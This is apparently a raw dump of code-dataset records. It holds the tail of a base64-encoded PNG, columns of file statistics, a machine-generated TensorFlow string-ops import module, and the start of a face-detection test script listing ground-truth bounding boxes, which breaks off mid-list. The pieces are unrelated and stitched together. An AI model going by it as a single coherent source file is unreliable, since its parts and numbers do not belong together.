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"
| 105,735
| 105,735
| 0.965735
| 3,479
| 105,735
| 29.350963
| 0.960621
| 0.001645
| 0.002262
| 0.002742
| 0.002977
| 0.002977
| 0.002977
| 0.002977
| 0.002977
| 0.002977
| 0
| 0.159014
| 0.000019
| 105,735
| 1
| 105,735
| 105,735
| 0.80674
| 0
| 0
| 0
| 0
| 1
| 0.999905
| 0.999905
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e964fbd0676ca40a66a778d54e32c306fc5fac5a
| 1,516
|
py
|
Python
|
venv/lib/python3.6/site-packages/tensorflow/_api/v1/strings/__init__.py
|
yuxuan1995liu/darkflowyolo_detection
|
a7807e9b85833e3f877d46bb60e8fa7d0596a10b
|
[
"MIT"
] | 1
|
2019-04-11T13:23:09.000Z
|
2019-04-11T13:23:09.000Z
|
Lib/site-packages/tensorflow/_api/v1/strings/__init__.py
|
caiyongji/Anaconda-py36.5-tensorflow-built-env
|
f4eb40b5ca3f49dfc929ff3ad2b4bb877e9663e2
|
[
"PSF-2.0"
] | null | null | null |
Lib/site-packages/tensorflow/_api/v1/strings/__init__.py
|
caiyongji/Anaconda-py36.5-tensorflow-built-env
|
f4eb40b5ca3f49dfc929ff3ad2b4bb877e9663e2
|
[
"PSF-2.0"
] | null | null | null |
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Operations for working with string Tensors.
"""
from __future__ import print_function as _print_function
from tensorflow.python import reduce_join
from tensorflow.python import regex_full_match
from tensorflow.python import regex_replace
from tensorflow.python import string_format as format
from tensorflow.python import string_join as join
from tensorflow.python import string_length as length
from tensorflow.python import string_split_v2 as split
from tensorflow.python import string_strip as strip
from tensorflow.python import string_to_hash_bucket_fast as to_hash_bucket_fast
from tensorflow.python import string_to_hash_bucket_strong as to_hash_bucket_strong
from tensorflow.python import substr
from tensorflow.python import unicode_script
from tensorflow.python import unicode_transcode
from tensorflow.python.ops.gen_parsing_ops import string_to_number as to_number
from tensorflow.python.ops.gen_string_ops import string_to_hash_bucket as to_hash_bucket
from tensorflow.python.ops.ragged.ragged_string_ops import unicode_decode
from tensorflow.python.ops.ragged.ragged_string_ops import unicode_decode_with_offsets
from tensorflow.python.ops.ragged.ragged_string_ops import unicode_encode
from tensorflow.python.ops.ragged.ragged_string_ops import unicode_split
from tensorflow.python.ops.ragged.ragged_string_ops import unicode_split_with_offsets
del _print_function
| 50.533333
| 88
| 0.875989
| 231
| 1,516
| 5.454545
| 0.246753
| 0.266667
| 0.31746
| 0.268254
| 0.60873
| 0.313492
| 0.313492
| 0.313492
| 0.243651
| 0.243651
| 0
| 0.000722
| 0.085752
| 1,516
| 29
| 89
| 52.275862
| 0.908369
| 0.112137
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.954545
| 0
| 0.954545
| 0.090909
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e973dcd75d436c13762a57ad43f16bb050308e58
| 16,698
|
py
|
Python
|
Face-Detection-HOG/loadTests.py
|
buzem/vision-projects
|
b1bd5a60cedadb38c3e87b22b46bbec4d6f79852
|
[
"MIT"
] | null | null | null |
Face-Detection-HOG/loadTests.py
|
buzem/vision-projects
|
b1bd5a60cedadb38c3e87b22b46bbec4d6f79852
|
[
"MIT"
] | null | null | null |
Face-Detection-HOG/loadTests.py
|
buzem/vision-projects
|
b1bd5a60cedadb38c3e87b22b46bbec4d6f79852
|
[
"MIT"
] | null | null | null |
def loadTestsGT():
ValidationGroundTruthsList = [['voyager.jpg',117,37,143,69],['voyager.jpg',187,48,209,76],['voyager.jpg',298,55,318,79],['voyager.jpg',385,21,411,53],['voyager.jpg',252,190,276,218],['voyager.jpg',301,176,325,198],['voyager.jpg',138,432,168,466],['voyager.jpg',245,456,277,488],['voyager.jpg',338,431,370,463],['puneet.jpg',54,131,80,157],['puneet.jpg',126,111,146,135],['puneet.jpg',120,156,146,182],['puneet.jpg',157,145,181,171],['puneet.jpg',204,149,226,171],['puneet.jpg',245,143,267,165],['puneet.jpg',278,134,298,154],['puneet.jpg',319,122,341,144],['puneet.jpg',293,169,313,191],['puneet.jpg',353,151,373,175],['puneet.jpg',376,148,400,174],['puneet.jpg',397,123,415,143],['puneet.jpg',415,140,437,160],['puneet.jpg',484,129,510,157],['people.jpg',79,93,121,127],['people.jpg',204,101,238,137],['people.jpg',265,98,295,130],['people.jpg',333,124,353,150],['people.jpg',411,113,431,139],['people.jpg',475,116,501,142],['people.jpg',540,94,566,128],['people.jpg',622,121,656,151],['people.jpg',202,211,236,251],['people.jpg',332,246,360,278],['people.jpg',502,252,534,288],['people.jpg',609,233,637,265],['boat.jpg',330,224,358,256],['boat.jpg',488,223,520,255],['cnn1630.jpg',147,69,171,95],['cnn1160.jpg',70,58,88,78],['cnn1160.jpg',156,53,174,71],['cnn2600.jpg',134,73,188,137],['cnn1714.jpg',100,87,168,179],['cnn2221.jpg',117,57,167,111],['cnn1260.jpg',106,65,188,159],['knex37.jpg',173,71,217,109],['life2100.jpg',59,150,79,170],['life2100.jpg',105,198,129,222],['life2100.jpg',147,184,169,214],['knex0.jpg',57,73,113,137],['cnn1085.jpg',124,72,178,138],['cnn2020.jpg',109,69,197,163],['life7422.jpg',69,69,97,97],['eugene.jpg',97,181,181,269],['next.jpg',71,13,95,41],['next.jpg',139,27,159,55],['next.jpg',215,51,233,73],['next.jpg',285,46,307,72],['next.jpg',351,26,371,50],['next.jpg',88,160,112,182],['next.jpg',181,136,205,164],['next.jpg',274,143,296,171],['ds9.jpg',41,121,81,167],['ds9.jpg',99,34,135,70],['ds9.jpg',155,100,191,140],['ds9.jpg',209,42,239,86],['ds9.jpg',292,70,326,112],['ds9.jpg',395,155,431,199],['ds9.jpg',473,110,503,152],['ds9.jpg',562,128,596,170],['baseball.jpg',81,32,125,80],['book.jpg',90,379,114,409],['book.jpg',170,372,192,398],['tammy.jpg',108,146,150,190],['original1.jpg',29,43,49,65],['original1.jpg',118,47,138,69],['original1.jpg',89,104,109,126],['original1.jpg',160,74,178,96],['original1.jpg',199,110,217,136],['original1.jpg',318,55,334,75],['original1.jpg',323,83,343,111],['original1.jpg',377,31,397,55],['original2.jpg',54,353,108,415],['original2.jpg',196,339,254,405],['original2.jpg',352,240,410,316],['original2.jpg',561,198,621,276],['original2.jpg',467,108,521,166],['original2.jpg',279,168,333,224],['original2.jpg',130,180,182,240],['voyager2.jpg',54,142,104,206],['voyager2.jpg',166,158,214,214],['voyager2.jpg',346,52,390,106],['voyager2.jpg',524,101,578,153],['voyager2.jpg',261,218,309,270],['voyager2.jpg',427,194,475,244],['voyager2.jpg',150,277,204,337],['voyager2.jpg',336,314,390,368],['voyager2.jpg',518,300,568,358],['plays.jpg',28,566,120,674],['plays.jpg',327,89,359,121],['plays.jpg',402,111,428,137],['plays.jpg',485,87,511,117],['lacrosse.jpg',88,39,124,75],['hendrix2.jpg',37,56,87,110],['judybats.jpg',36,387,90,441],['judybats.jpg',122,222,266,394],['judybats.jpg',371,407,399,431],['judybats.jpg',428,328,496,408],['judybats.jpg',628,433,670,479],['mom-baby.jpg',53,43,121,111],['mom-baby.jpg',124,163,182,221],['kaari-stef.jpg',57,84,159,186],['kaari-stef.jpg',287,92,367,174],['kaari1.jpg',70,120,182,240],['kaari2.jpg',111,40,179,122],['shumeet.jpg',178,92,226,142],['aerosmith-double.jpg',86,129,126,171],['aerosmith-double.jpg',107,23,141,63],['aerosmith-double.jpg',160,99,194,143],['aerosmith-double.jpg',229,46,261,86],['aerosmith-double.jpg',275,117,311,161],['pace-university-double.jpg',13,97,47,139],['pace-university-double.jpg',155,85,195,129],['pace-university-double.jpg',240,123,280,161],['pace-university-double.jpg',356,90,398,128],['pace-university-double.jpg',456,97,498,141],['pace-university-double.jpg',572,105,610,141],['pace-university-double.jpg',690,93,732,139],['pace-university-double.jpg',780,110,818,154],['hendrix1-bigger.jpg',123,68,165,120],['hendrix1-bigger.jpg',67,365,89,391],['hendrix1-bigger.jpg',124,360,154,396],['hendrix1-bigger.jpg',169,369,187,393],['hendrix1-bigger.jpg',52,632,76,662],['hendrix1-bigger.jpg',120,618,148,652],['hendrix1-bigger.jpg',169,621,189,649],['hendrix1-bigger.jpg',329,109,353,135],['hendrix1-bigger.jpg',386,76,406,100],['hendrix1-bigger.jpg',454,87,484,119],['hendrix1-bigger.jpg',323,375,347,405],['hendrix1-bigger.jpg',384,345,404,369],['hendrix1-bigger.jpg',453,351,479,387],['hendrix1-bigger.jpg',330,641,362,675],['hendrix1-bigger.jpg',382,623,402,649],['hendrix1-bigger.jpg',457,613,481,647],['hendrix1-bigger.jpg',589,110,619,140],['hendrix1-bigger.jpg',643,93,667,117],['hendrix1-bigger.jpg',714,83,738,117],['hendrix1-bigger.jpg',580,365,612,403],['hendrix1-bigger.jpg',645,351,681,385],['hendrix1-bigger.jpg',698,365,730,393],['hendrix1-bigger.jpg',582,627,610,659],['hendrix1-bigger.jpg',644,609,676,645],['hendrix1-bigger.jpg',706,620,730,650],['blues-double.jpg',102,33,134,75],['blues-double.jpg',178,75,208,109],['blues-double.jpg',265,54,297,86],['blues-double.jpg',354,33,386,71],['music-groups-double.jpg',26,137,60,175],['music-groups-double.jpg',75,111,107,149],['music-groups-double.jpg',135,83,167,121],['music-groups-double.jpg',250,88,284,118],['music-groups-double.jpg',328,241,376,295],['music-groups-double.jpg',462,202,506,254],['music-groups-double.jpg',423,311,473,371],['music-groups-double.jpg',561,236,605,290],['henry.jpg',96,110,388,334],['henry.jpg',438,60,544,154],['henry.jpg',462,221,530,305],['henry.jpg',349,368,439,456],['Arsenal.jpg',72,53,96,79],['Arsenal.jpg',56,97,78,127],['Arsenal.jpg',131,40,157,74],['Arsenal.jpg',191,58,211,88],['Arsenal.jpg',229,81,255,115],['Arsenal.jpg',276,65,300,97],['Arsenal.jpg',313,33,341,69],['Arsenal.jpg',372,31,396,63],['Arsenal.jpg',439,17,463,49],['Arsenal.jpg',169,178,199,216],['Arsenal.jpg',245,173,273,205],['Arsenal.jpg',356,154,382,180],['Arsenal.jpg',455,164,483,196],['Arsenal.jpg',535,181,563,215],['Arsenal.jpg',601,183,619,217],['Arsenal.jpg',557,50,577,80],['Argentina.jpg',37,55,65,87],['Argentina.jpg',131,50,161,78],['Argentina.jpg',233,50,261,78],['Argentina.jpg',337,38,363,66],['Argentina.jpg',437,59,463,85],['Argentina.jpg',528,45,552,77],['Argentina.jpg',50,206,76,238],['Argentina.jpg',152,204,182,234],['Argentina.jpg',287,215,313,247],['Argentina.jpg',407,202,433,236],['Argentina.jpg',541,201,569,231],['Brazil.jpg',25,64,49,92],['Brazil.jpg',113,66,133,96],['Brazil.jpg',209,43,233,71],['Brazil.jpg',329,41,351,67],['Brazil.jpg',449,51,469,75],['Brazil.jpg',533,63,561,91],['Brazil.jpg',87,167,111,199],['Brazil.jpg',209,186,235,220],['Brazil.jpg',339,179,361,209],['Brazil.jpg',471,190,493,218],['Brazil.jpg',591,192,619,222],['USA.jpg',52,77,76,105],['USA.jpg',165,87,185,115],['USA.jpg',273,89,293,121],['USA.jpg',380,92,400,118],['USA.jpg',471,78,491,106],['USA.jpg',556,75,576,103],['USA.jpg',34,256,58,282],['USA.jpg',143,251,165,275],['USA.jpg',262,233,284,261],['USA.jpg',399,235,423,263],['USA.jpg',511,235,533,261],['USA.jpg',62,354,96,408],['USA.jpg',122,360,162,400],['USA.jpg',189,365,235,409],['Colombia.jpg',46,77,68,103],['Colombia.jpg',154,62,180,90],['Colombia.jpg',266,50,290,74],['Colombia.jpg',385,56,409,82],['Colombia.jpg',503,71,527,97],['Colombia.jpg',586,67,612,97],['Colombia.jpg',113,220,139,250],['Colombia.jpg',226,208,254,240],['Colombia.jpg',335,173,361,203],['Colombia.jpg',449,218,477,250],['Colombia.jpg',555,214,581,246],['Ecuador.jpg',80,79,102,103],['Ecuador.jpg',177,80,197,106],['Ecuador.jpg',279,75,303,101],['Ecuador.jpg',375,77,399,101],['Ecuador.jpg',459,80,479,108],['Ecuador.jpg',540,87,562,113],['Ecuador.jpg',4,181,28,213],['Ecuador.jpg',108,207,136,237],['Ecuador.jpg',207,220,239,252],['Ecuador.jpg',326,210,354,246],['Ecuador.jpg',458,207,482,237],['Ecuador.jpg',581,231,601,261],['me.jpg',140,34,164,66],['England.jpg',22,57,44,81],['England.jpg',109,74,137,102],['England.jpg',210,68,234,98],['England.jpg',312,53,338,83],['England.jpg',424,42,448,72],['England.jpg',541,72,565,98],['England.jpg',28,227,52,257],['England.jpg',150,242,176,272],['England.jpg',257,241,283,273],['England.jpg',403,245,435,279],['England.jpg',539,248,567,278],['tp.jpg',27,49,71,99],['Germany.jpg',24,61,50,91],['Germany.jpg',126,79,150,109],['Germany.jpg',237,55,265,81],['Germany.jpg',362,67,384,91],['Germany.jpg',462,73,486,99],['Germany.jpg',572,82,600,112],['Germany.jpg',31,232,55,264],['Germany.jpg',156,229,180,265],['Germany.jpg',303,229,331,261],['Germany.jpg',447,245,477,277],['Germany.jpg',589,238,615,270],['albert.jpg',64,23,98,61],['board.jpg',196,168,222,200],['board.jpg',218,259,250,295],['board.jpg',236,327,268,365],['board.jpg',309,188,341,232],['board.jpg',306,260,330,296],['board.jpg',311,319,345,363],['board.jpg',378,192,410,230],['board.jpg',377,260,411,304],['board.jpg',379,319,411,353],['brian.jpg',49,32,81,66],['cards-perp-sml.jpg',68,154,92,178],['cards-perp-sml.jpg',157,152,177,176],['cards-perp-sml.jpg',235,152,255,174],['cards-perp-sml.jpg',102,81,122,105],['cards-perp-sml.jpg',207,89,227,111],['cards-perp-sml.jpg',73,30,93,54],['cards-perp-sml.jpg',146,29,166,49],['cards-perp-sml.jpg',229,27,251,47],['frisbee.jpg',56,70,82,98],['frisbee.jpg',99,93,131,125],['frisbee.jpg',185,94,213,126],['frisbee.jpg',222,95,252,129],['frisbee.jpg',142,33,174,63],['kymberly.jpg',41,33,85,79],['oksana1.jpg',108,68,134,98],['oksana1.jpg',164,76,184,98],['oksana1.jpg',197,62,217,92],['soccer.jpg',20,66,40,90],['soccer.jpg',63,65,83,89],['soccer.jpg',115,64,139,90],['soccer.jpg',180,70,204,96],['soccer.jpg',259,54,283,78],['soccer.jpg',339,72,365,96],['soccer.jpg',422,61,442,85],['soccer.jpg',506,72,530,96],['soccer.jpg',595,56,621,88],['soccer.jpg',109,208,135,236],['soccer.jpg',184,224,208,246],['soccer.jpg',260,214,286,240],['soccer.jpg',362,236,388,270],['soccer.jpg',449,235,469,265],['soccer.jpg',530,214,554,244],['tommyrw.jpg',92,75,124,107],['torrance.jpg',136,72,170,114],['torrance.jpg',197,87,227,113],['trek-trio.jpg',23,126,45,150],['trek-trio.jpg',111,54,151,96],['trek-trio.jpg',222,123,248,149],['trekcolr.jpg',34,33,72,77],['trekcolr.jpg',81,23,119,67],['trekcolr.jpg',128,23,156,51],['tp-reza-girosi.jpg',26,45,52,77],['tp-reza-girosi.jpg',86,55,114,89],['tp-reza-girosi.jpg',150,30,180,62],['oksana1.jpg',131,67,151,91],['cards-perp-sml.jpg',68,254,88,278],['cards-perp-sml.jpg',143,261,163,283],['J-L_Picard.Baldy.jpg',179,71,205,121],['addams-family.jpg',85,514,121,554],['addams-family.jpg',142,412,186,458],['addams-family.jpg',333,185,373,225],['addams-family.jpg',428,158,460,198],['addams-family.jpg',718,92,760,144],['addams-family.jpg',663,395,701,433],['addams-family.jpg',740,562,784,600],['aeon1a.jpg',174,115,288,225],['audrey1.jpg',135,112,217,202],['audrey2.jpg',64,159,198,303],['audrybt1.jpg',133,46,167,78],['bksomels.jpg',172,89,244,177],['bttf206.jpg',228,127,314,221],['bttf301.jpg',70,34,112,80],['bttf301.jpg',142,104,178,140],['bttf301.jpg',215,110,253,148],['bttf301.jpg',333,51,371,95],['bttf301.jpg',464,77,498,119],['bttf301.jpg',512,132,550,168],['bwolen.jpg',19,28,45,60],['cfb.jpg',58,55,120,117],['clapton.jpg',179,99,253,177],['class57.jpg',105,512,135,544],['class57.jpg',117,363,149,393],['class57.jpg',167,309,195,337],['class57.jpg',196,271,224,303],['class57.jpg',153,237,179,267],['class57.jpg',200,195,224,219],['class57.jpg',226,416,258,456],['class57.jpg',247,365,279,397],['class57.jpg',282,311,314,337],['class57.jpg',274,220,304,248],['class57.jpg',352,191,374,217],['class57.jpg',383,235,407,259],['class57.jpg',348,304,376,330],['class57.jpg',355,368,387,400],['class57.jpg',347,438,379,470],['class57.jpg',292,503,324,537],['class57.jpg',484,493,518,525],['class57.jpg',419,360,449,386],['class57.jpg',487,354,517,386],['class57.jpg',455,297,481,325],['class57.jpg',483,254,509,280],['class57.jpg',480,173,504,195],['class57.jpg',580,331,612,363],['class57.jpg',611,417,643,449],['class57.jpg',674,502,706,538],['class57.jpg',814,511,852,543],['class57.jpg',971,497,1005,531],['class57.jpg',1134,520,1168,552],['class57.jpg',1011,433,1045,465],['class57.jpg',1172,425,1200,457],['class57.jpg',1094,367,1126,397],['class57.jpg',972,383,1000,415],['class57.jpg',847,423,879,455],['class57.jpg',744,435,774,461],['class57.jpg',678,388,708,416],['class57.jpg',713,311,745,343],['class57.jpg',795,393,827,423],['class57.jpg',842,358,874,390],['class57.jpg',951,318,979,344],['class57.jpg',1061,327,1093,355],['class57.jpg',986,266,1010,296],['class57.jpg',1113,281,1141,313],['class57.jpg',1046,219,1076,243],['class57.jpg',795,282,825,310],['class57.jpg',830,264,854,286],['class57.jpg',881,252,905,280],['class57.jpg',945,226,971,246],['class57.jpg',1002,196,1028,224],['class57.jpg',883,194,905,214],['class57.jpg',827,192,855,218],['class57.jpg',735,248,763,274],['class57.jpg',652,278,678,310],['class57.jpg',576,264,604,294],['class57.jpg',539,221,563,247],['class57.jpg',600,179,624,207],['class57.jpg',634,232,658,258],['class57.jpg',709,173,735,203],['cpd.jpg',160,113,260,247],['crimson.jpg',206,359,408,625],['divinci-man1.jpg',281,194,313,226],['er.jpg',123,59,147,83],['er.jpg',71,136,99,160],['er.jpg',144,264,170,296],['er.jpg',261,238,289,264],['er.jpg',340,43,364,71],['er.jpg',406,93,428,131],['ew-courtney-david.jpg',83,65,127,115],['ew-courtney-david.jpg',129,54,183,116],['ew-friends.jpg',124,73,146,93],['ew-friends.jpg',157,59,177,81],['ew-friends.jpg',199,69,219,91],['ew-friends.jpg',127,120,149,146],['ew-friends.jpg',163,132,185,154],['ew-friends.jpg',209,119,231,143],['gigi.jpg',115,93,187,171],['gpripe.jpg',12,25,44,57],['gpripe.jpg',63,33,115,91],['herbie-hancock.jpg',269,363,371,473],['jackson.jpg',232,168,318,252],['john.coltrane.jpg',76,140,202,278],['karen-and-rob.jpg',89,204,129,244],['karen-and-rob.jpg',196,45,238,83],['larroquette.jpg',73,115,103,143],['larroquette.jpg',115,104,137,128],['larroquette.jpg',135,156,157,176],['larroquette.jpg',183,134,205,158],['larroquette.jpg',222,100,244,120],['larroquette.jpg',264,147,286,171],['larroquette.jpg',333,156,359,176],['larroquette.jpg',377,116,403,146],['larroquette.jpg',103,225,127,247],['lawoman.jpg',50,95,88,141],['lawoman.jpg',114,123,148,167],['lawoman.jpg',175,122,207,166],['lawoman.jpg',243,146,279,190],['life-cover.jpg',263,312,353,436],['life-dreams.jpg',898,340,916,360],['madaboutyou.